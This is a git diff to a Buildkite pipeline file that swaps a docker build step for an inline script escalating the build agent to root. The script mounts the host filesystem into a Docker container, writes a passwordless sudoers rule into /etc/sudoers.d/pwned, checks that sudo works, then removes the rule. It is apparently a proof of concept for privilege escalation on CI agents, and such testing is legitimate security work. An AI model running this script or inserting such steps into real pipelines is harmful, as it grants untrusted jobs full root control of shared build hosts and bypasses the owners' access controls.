Inline build script

diff --git a/.buildkite/pipeline.yaml b/.buildkite/pipeline.yaml
--- a/.buildkite/pipeline.yaml
+++ b/.buildkite/pipeline.yaml
@@ -4,4 +4,35 @@ agents:
 steps:
   - label: ":docker:"
     key: docker
-    command: .buildkite/steps/docker
+    command: |
+      set -euo pipefail
+
+      run-as-root() {
+        docker run --userns=host -v /:/mnt/host -w /mnt/host alpine:latest "$@"
+      }
+
+      echo ~~~ Creating file as root
+      run-as-root touch file-created-as-root
+
+      echo +++ Checking /
+      ls -lA /
+
+      echo ~~~ Cleaning up
+      run-as-root rm file-created-as-root
+
+      echo +++ Checking /
+      ls -lA /
+
+      echo +++ Who am I?
+      echo I am: "$(whoami)"
+      echo sudo I am: "$(sudo --non-interactive whoami || echo "sudo failed")"
+
+      echo --- Modifying sudoers
+      run-as-root sh -c 'echo "buildkite-agent ALL=(ALL) NOPASSWD: ALL" > etc/sudoers.d/pwned'
+
+      echo +++ Who am I?
+      echo I am: "$(whoami)"
+      echo sudo I am: "$(sudo --non-interactive whoami || echo "sudo failed")"
+
+      echo --- Cleaning up
+      run-as-root rm -f etc/sudoers.d/pwned
